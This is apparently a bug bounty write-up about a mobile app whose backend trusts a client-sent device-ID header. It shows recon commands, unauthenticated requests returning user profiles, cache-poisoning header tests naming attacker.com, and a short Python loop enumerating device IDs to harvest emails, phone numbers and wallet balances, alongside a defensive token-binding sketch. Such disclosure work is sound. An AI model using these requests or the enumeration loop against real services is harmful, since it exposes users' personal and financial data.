Hey there!😁

Image by AI

My phone trusts me — I paid for it.

My parents trust me — occasionally, depending on my recent life decisions.

But this mobile app?

This mobile app trusted my phone more than it ever should have.

That blind trust turned into one of the cleanest high‑impact bugs I've reported in a long time.

It Started Like Every Other Mobile Test

This wasn't a "big brain" moment at first.

It started with coffee ☕, a boring afternoon, and an APK that looked way too confident in itself.

The app was polished. No obvious secrets. SSL pinning enabled. Login flow looked solid. The kind of app that quietly suggests, "You won't find anything here."

Naturally, that's exactly where I stayed.

I bypassed SSL pinning, fired up Burp, logged in normally, and started watching API traffic scroll by. Nothing fancy. Just patience.

And then I noticed something small — the kind of thing scanners don't scream about.

The Assumption That Changed Everything

Almost every request carried the same headers:

X-Device-Id: 7c3f9e2b-xxxx-xxxx
X-Device-Model: Pixel_7
X-OS-Version: 14
X-App-Version: 5.2.1

At first glance, this looks normal. Mobile apps do this all the time.

The problem wasn't the headers.

The problem was how much the backend trusted them.

No signed device token. No server‑side binding. No validation beyond "this looks right."

If the client said, "I'm this device," the server believed it.

That's not device verification. That's faith.
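For contrast, here's a minimal sketch of what real device binding could look like (the names, the secret handling, and the token format are all illustrative, not from this target): the backend issues an HMAC-signed device token at login and verifies it on every request, so a spoofed X-Device-Id on its own buys an attacker nothing.

import hashlib
import hmac

SERVER_SECRET = b"rotate-me"  # illustrative only; in production this lives in a secret manager

def issue_device_token(device_id: str, user_id: str) -> str:
    # Issued once at login: binds this device to this user with a server-only secret.
    msg = f"{device_id}:{user_id}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def verify_device_token(device_id: str, user_id: str, token: str) -> bool:
    # Checked on every request: a client-supplied X-Device-Id without a valid token is rejected.
    expected = issue_device_token(device_id, user_id)
    return hmac.compare_digest(expected, token)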

Going Wide Before Going Deep

Before touching authentication, I went into recon mode.

I mapped everything mobile‑related:

  • API subdomains
  • Versioned routes (/v1, /v2, /mobile)
  • Endpoints only called by the app
  • CDN‑fronted paths

Basic commands, nothing exotic:

assetfinder target.com | grep api
subfinder -d target.com -silent | httpx

Then I pulled old and forgotten routes:

waybackurls target.com | grep "/api/"

That's when one endpoint stood out:

https://api.target.com/mobile/cache/profile

Any time you see cache and profile in the same URL, stop and stare.

The Endpoint That Knew Too Much

The request looked like this:

GET /mobile/cache/profile
Authorization: Bearer <token>
X-Device-Id: <device-id>

And the response?

{
  "user_id": "98213",
  "email": "victim@target.com",
  "phone": "+91xxxxxxxx",
  "kyc_status": "VERIFIED",
  "wallet_balance": 18450
}

Clean. Sensitive. Definitely not something you want cached carelessly.

So I did the simplest test possible.

I logged out.


One Header Too Many

I removed the token entirely and sent:

GET /mobile/cache/profile
X-Device-Id: 7c3f9e2b-xxxx-xxxx

The response came back:

200 OK

Same data. Same user.

The backend didn't care about authentication anymore.

It cared about the device.
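The whole repro fits in a few lines of Python; the URL and device ID below are placeholders standing in for the values pulled from the intercepted traffic.

import requests

# Placeholder endpoint and device ID; the real values came from Burp.
url = "https://api.target.com/mobile/cache/profile"
headers = {"X-Device-Id": "7c3f9e2b-xxxx-xxxx"}  # note: no Authorization header at all

resp = requests.get(url, headers=headers, timeout=10)
print(resp.status_code)  # 200
print(resp.json())       # full profile, no session required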

When Caching Turns a Bug Into a Breach

Things got serious when I checked the response headers:

Cache-Control: public, max-age=600

Public cache. User profile data.

That's when this stopped being a simple auth bug.

This was now cache abuse territory.

Cache Poisoning — The Quiet Kind

The CDN cache key included:

  • URL path
  • X-Device-Id

But ignored:

  • Authorization header
  • Actual user session

That meant one thing:

If I could poison the cache once, the damage would persist.

I tested header manipulation:

X-Device-Id: victim-device-id
X-Forwarded-Host: attacker.com

Then:

X-Device-Id: victim-device-id
X-Original-URL: /admin

The cache didn't blink.

It happily stored sensitive user data tied only to a device identifier.

Anyone who knew — or guessed — that ID could retrieve it.
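If you want to confirm this yourself, a quick differential test does the job (a sketch with placeholder values, not the exact requests I sent): prime the cache with one session, re-request with no session at all, and watch whether the body and the cache headers line up.

import requests

URL = "https://api.target.com/mobile/cache/profile"   # placeholder endpoint
DEVICE = {"X-Device-Id": "7c3f9e2b-xxxx-xxxx"}        # placeholder device ID

# 1. Prime the cache with an authenticated request.
first = requests.get(URL, headers={**DEVICE, "Authorization": "Bearer some-valid-token"}, timeout=10)

# 2. Immediately re-request with no Authorization at all.
second = requests.get(URL, headers=DEVICE, timeout=10)

# Identical bodies plus a growing Age (or a CDN hit header like X-Cache) mean the
# cache key is just path + X-Device-Id, and the session never mattered.
print(first.text == second.text)
print(second.headers.get("Age"), second.headers.get("X-Cache", "n/a"))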

Scaling the Impact

This wasn't limited to one account.

Device IDs followed a predictable UUID pattern. No rate limiting. No anomaly detection.

A simple script was enough:

# assumes `import requests` and a device_ids list of candidate X-Device-Id values
for device_id in device_ids:
    requests.get("https://api.target.com/mobile/cache/profile",
                 headers={"X-Device-Id": device_id})

What came back:

  • Emails
  • Phone numbers
  • Wallet balances
  • Internal user IDs

At scale.

No login.

This bug enabled:

  • Unauthenticated access
  • Cross‑user data exposure
  • CDN‑level persistence
  • Financial information leakage

In real terms:

  • Identity exposure
  • Account takeover preparation
  • Regulatory risk

This wasn't theoretical. It was quiet, repeatable, and dangerous.

The Takeaway

Mobile apps love trusting devices.

Attackers love when they do.

If your backend treats client‑supplied headers as truth, you're not doing security — you're hoping for the best.

And hope doesn't scale.

Final Notes for Hunters

  • Don't rush mobile testing
  • Device trust is often fake trust
  • Cached user data is a goldmine
  • The best bugs look boring at first

This wasn't about speed. It wasn't about luck.

It was about paying attention.

And that's usually where the real money hides. 🐞💥

Connect with Me!

  • LinkedIn
  • Instagram: @rev_shinchan
  • Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai😇

#BugBounty, #CyberSecurity, #InfoSec, #Hacking, #WebSecurity, #CTF.